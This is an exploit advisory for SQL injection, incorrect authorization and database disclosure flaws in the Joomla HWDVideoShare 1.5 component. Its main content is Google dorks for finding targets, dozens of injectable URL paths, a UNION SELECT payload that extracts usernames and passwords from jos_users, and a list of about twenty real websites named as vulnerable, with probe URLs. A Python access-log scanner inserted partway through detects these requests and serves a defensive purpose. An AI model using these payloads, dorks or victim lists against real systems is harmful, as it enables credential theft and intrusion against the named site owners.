KingSkrupellos

Joomla HWDVideoShare Components 1.5 Multiple Vuln

Jan 31st, 2019
####################################################################

# Exploit Title : Joomla HWDVideoShare Components 1.5 SQL Injection / Database Disclosure / Incorrect Authorization
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 30/01/2019
# Vendor Homepage : joomla.org ~ hwdmediashare.co.uk
# Software Download Link : hwdmediashare.co.uk/hwdvideoshare
# Software Source Files and Codes :
github.com/rkern21/videoeditor/tree/master/administrator/components/com_hwdvideoshare
# Software Version : 1.0 and 1.5
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : inurl:''/index.php?option=com_hwdvideoshare''
intext:Joomla Video Component by hwdVideoShare
intext:Designed & Developed by Quantum Pro 4 Information Technology
intext:desenvolvido por MANUEL PEDREIRO
intext:Icones por "Marcos Antonio"
intext:Powered by hwdMediaShare
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
CWE-200 [ Information Exposure ]
CWE-863 [ Incorrect Authorization ]
# Similar but Old CVE 02/22/2008 : cvedetails.com/cve/CVE-2008-0916/ - CVE-2008-0916
Note : Keep in mind that this exploit/vulnerability is described in more detail for another version.
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : cxsecurity.com/issue/WLB-2019010286

####################################################################

# Description about Software :
***************************

* hwdVideoShare was a powerful Joomla 1.5 video gallery that allowed Joomla webmasters to display video media in an organised and manageable layout on the internet. The gallery could handle the uploading, server-side processing and playback of large video media in all popular formats. It could also import videos from popular video websites such as Youtube and Vimeo.

####################################################################

# Impact :
***********

* SQL injection vulnerability in the HWDVideoShare (com_hwdvideoshare) 1.5 component for Joomla! allows remote attackers to execute arbitrary SQL commands via the cat_id, Itemid, pattern, hwdcorder and video_id parameters passed to index.php under the different task actions, and the administrator component files disclose SQL database errors.

* An attacker might be able to inject and/or alter existing SQL statements, which would influence the database exchange.

* The component fails to sufficiently sanitize user-supplied data before using it in an SQL query.

* Exploiting this issue could allow an attacker to compromise the application, read, access or modify data, or exploit latent vulnerabilities in the underlying database. If the webserver is misconfigured, read & write access to the filesystem may be possible.

* hwdVideoShare performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. This allows attackers to bypass intended access restrictions.

####################################################################

# SQL Injection Exploit :
**********************

/administrator/components/com_hwdvideoshare/libraries/warp/infin-lib.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.nusoap_base.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.soap_fault.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.soap_parser.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.soap_server.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.soap_transport_http.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.soap_val.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.soapclient.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.wsdl.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.wsdlcache.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.xmlschema.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/warp/nusoap/nusoap.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/GIFEncoder.class.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/csv_iterator.class.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/file_management.class.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/maintenance_archivelogs.class.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/maintenance_fixerrors.class.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/maintenance_recount.class.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/mysql_backup.class.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/streamers.class.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/thumbnail.inc.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/id3/getid3.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/id3/getid3.lib.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/smarty/Config_File.class.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/smarty/Smarty.class.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/smarty/Smarty_Compiler.class.php?id=[SQL Injection]

/administrator/components/com_hwdvideoshare/libraries/thumbnail/thumbnail.inc.php?id=[SQL Injection]

/index.php?option=com_hwdvideoshare&Itemid=[SQL Injection]

/index.php?option=com_hwdvideoshare&task=frontpage&Itemid=[SQL Injection]

/index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=[SQL Injection]

/index.php?option=com_hwdvideoshare&task=search&Itemid=[SQL Injection]

/index.php?option=com_hwdvideoshare&task=search&Itemid=[ID-NUMBER]&pattern=[SQL Injection]

/index.php?option=com_hwdvideoshare&task=categories&Itemid=[SQL Injection]

/index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=categories&hwdcorder=[SQL Injection]

/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=[ID-NUMBER]&video_id=[SQL Injection]

/index.php?option=com_hwdvideoshare&task=viewcategory&Itemid=[ID-NUMBER]&cat_id=[SQL Injection]

/index.php?option=com_hwdvideoshare&task=displayresults&Itemid=[ID-NUMBER]&rpp=[ID-NUMBER]&sort=[ID-NUMBER]&ep=&ex=&category_id=[ID-NUMBER]&pattern=[SQL Injection]

# Exploit Payload PoC :
*********************

/[ID-NUMBER]&cat_id=-9999999/**/union/**/select/**/000,111,222,username,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2/**/from/**/jos_users/*

####################################################################

# Add Video File without Authorization / Incorrect Authorization Exploit :
**********************************************************************

/index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=upload

/index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=upload&lang=en

# Directory File Path :
*******************

/index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=categories

/index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=groups

/index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=frontpage

/index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=viewvideo&video_id=[ID-NUMBER]?tmpl=component

# Note : If a website is not vulnerable, it responds with :

You are not authorized to upload videos.

####################################################################

# Database Disclosure Exploit :
***************************

/administrator/components/com_hwdvideoshare/install.mysql.nonutf8.sql

/administrator/components/com_hwdvideoshare/install.mysql.utf8.sql

####################################################################
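For site owners still running this component, the request shapes listed above (non-numeric values in Itemid, cat_id, video_id, hwdcorder or category_id; UNION/SELECT or quote characters in the search pattern; direct requests to the admin-side library classes with an id= query string; fetches of the install.mysql.*.sql dumps) are all visible in ordinary web server access logs. The following scanner is an added example written for this page, not code from the advisory author or the hwdVideoShare project; the log lines, IP addresses and hostnames in SAMPLE_LOG are constructed, and the indicator names are this example's own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Combined Log Format). IPs and paths are
# placeholders chosen to mirror the request shapes in the advisory above.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Jan/2019:10:00:01 +0000] "GET /index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=41&video_id=166 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [31/Jan/2019:10:00:02 +0000] "GET /index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=41&video_id=166%27 HTTP/1.1" 500 812 "-" "Mozilla/5.0"
10.0.0.9 - - [31/Jan/2019:10:00:03 +0000] "GET /index.php?option=com_hwdvideoshare&task=viewcategory&Itemid=66&cat_id=-9999999/**/union/**/select/**/000,111,222,username,password/**/from/**/jos_users/* HTTP/1.1" 200 9031 "-" "Mozilla/5.0"
10.0.0.9 - - [31/Jan/2019:10:00:04 +0000] "GET /administrator/components/com_hwdvideoshare/libraries/maintenance_recount.class.php?id=1%27 HTTP/1.1" 200 403 "-" "Mozilla/5.0"
10.0.0.9 - - [31/Jan/2019:10:00:05 +0000] "GET /administrator/components/com_hwdvideoshare/install.mysql.utf8.sql HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
10.0.0.7 - - [31/Jan/2019:10:00:06 +0000] "GET /index.php?option=com_hwdvideoshare&task=search&Itemid=54&pattern=holiday HTTP/1.1" 200 3300 "-" "Mozilla/5.0"
"""

# Combined Log Format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Front-end parameters the advisory lists as injection points; the component
# expects plain integer ids here (the advisory's placeholders are [ID-NUMBER]).
NUMERIC_PARAMS = ("Itemid", "cat_id", "video_id", "hwdcorder", "category_id", "rpp", "sort")

# Admin-side library classes are meant to be included, never requested directly.
ADMIN_LIB_PREFIX = "/administrator/components/com_hwdvideoshare/libraries/"
INSTALL_SQL_RE = re.compile(
    r"/administrator/components/com_hwdvideoshare/install\.mysql\.[a-z0-9]+\.sql$"
)


def looks_injected(value):
    """True for a quote character or a UNION ... SELECT sequence, after
    collapsing /**/ inline comments that are used in place of spaces."""
    collapsed = re.sub(r"/\*.*?\*/", " ", value)
    if "'" in collapsed or '"' in collapsed:
        return True
    return re.search(r"\bunion\b.*\bselect\b", collapsed, re.I) is not None


def classify_request(target):
    """Return the list of indicator names that fire for one request target."""
    reasons = []
    parts = urlsplit(target)
    path = parts.path
    params = parse_qs(parts.query, keep_blank_values=True)  # values are URL-decoded

    if INSTALL_SQL_RE.search(path):
        reasons.append("install-sql-dump-requested")

    if path.startswith(ADMIN_LIB_PREFIX) and path.endswith(".php") and "id" in params:
        reasons.append("direct-library-request-with-id")

    if params.get("option", [""])[0] == "com_hwdvideoshare":
        for name in NUMERIC_PARAMS:
            for value in params.get(name, []):
                if looks_injected(value):
                    reasons.append(f"injection-probe-in-{name}")
                elif not value.isdigit():
                    reasons.append(f"non-numeric-{name}")
        # pattern is free-text search input, so only quotes or UNION/SELECT count
        for value in params.get("pattern", []):
            if looks_injected(value):
                reasons.append("injection-probe-in-pattern")
    return reasons


def scan_access_log(log_text):
    """Parse each log line and return the suspicious ones with their indicators."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m.group("target"))
        if reasons:
            findings.append({
                "ip": m.group("ip"),
                "status": int(m.group("status")),
                "target": m.group("target"),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["ip"], f["status"], ", ".join(f["reasons"]), f["target"])
```

Run against a real log by reading the file into scan_access_log(). A 200 response to an install.mysql.*.sql request or to a direct library-class request means the file is reachable and should be removed or blocked at the web server; repeated injection-probe hits from one client against the numeric parameters are the signature of the probing described in this advisory.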

# Example Vulnerable Sites :
*************************

[+] visionartepro.com/index.php?option=com_hwdvideoshare&task=search&Itemid=96%27

[+] visionartepro.com/administrator/components/com_hwdvideoshare/libraries/warp/nusoap/nusoapmime.php?id=1%27

[+] thenationalgamingleague.com/index.php?option=com_hwdvideoshare&Itemid=243%27

[+] thenationalgamingleague.com/administrator/components/com_hwdvideoshare/install.mysql.utf8.sql

[+] kondicionitrening.com/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=67&video_id=44%27

[+] cypruscommunitymedia.org/index.php?option=com_hwdvideoshare&task=viewcategory&Itemid=66&cat_id=5%27

[+] canal44.tv/canal44-2-0-1/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=109&video_id=15%27

[+] super.besteciler.com/index.php?Itemid=78&option=com_hwdvideoshare&task=viewvideo&video_id=13%27

[+] sijpa.org/index.php?option=com_hwdvideoshare&Itemid=24%27

[+] mustang.is/~mustan13/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=41&video_id=166%27

[+] redrecicladores.net/2015/backup/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=89&video_id=15%27

[+] globalclimbing.net/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=78&video_id=132%27

[+] almuslimalmuaser.org/index.php?option=com_hwdvideoshare&task=categories&Itemid=129%27

[+] lineprosperity.ru/index.php/index.php?option=com_hwdvideoshare&task=viewcategory&Itemid=51&cat_id=30%27

[+] buenobr.com.br/blog/index.php?option=com_hwdvideoshare&Itemid=57&task=categories&hwdcorder=1%27

[+] tonyromano.info/index.php?option=com_hwdvideoshare&task=displayresults&Itemid=4&rpp=0&sort=0&ep=&ex=&category_id=0&pattern=1%27

[+] rallyrace.it/2009/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=93&video_id=7%27

[+] lnx.dehonianos.org/pjuvenilv/index.php?option=com_hwdvideoshare&Itemid=30%27

[+] qapsites.com.br/coophalis/index.php?option=com_hwdvideoshare&task=search&Itemid=54&pattern=1%27

[+] jovemguarda.com.br/50anos/index.php?option=com_hwdvideoshare&task=frontpage&Itemid=60%27

[+] dehonianos.org/pjuvenilv/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=30&video_id=3%27

####################################################################

# SQL Database Error :
*********************

Warning: Creating default object from empty value in
/home/kondicio/public_html/administrator/components
/com_hwdvideoshare/libraries/maintenance_recount.class.php on line 284

Strict Standards: Non-static method JLoader::import() should not be
called statically in /home/redrec26/public_html/2015/backup/libraries
/joomla/import.php on line 29

Fatal error: Uncaught Error: Call to undefined function set_magic_quotes_runtime()
in /home/creaarte/public_html/visionartepro.com/includes/framework.php:21
Stack trace: #0 /home/creaarte/public_html/visionartepro.com/index.php(22):
require_once() #1 {main} thrown in /home/creaarte/public_html
/visionartepro.com/includes/framework.php on line 21

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################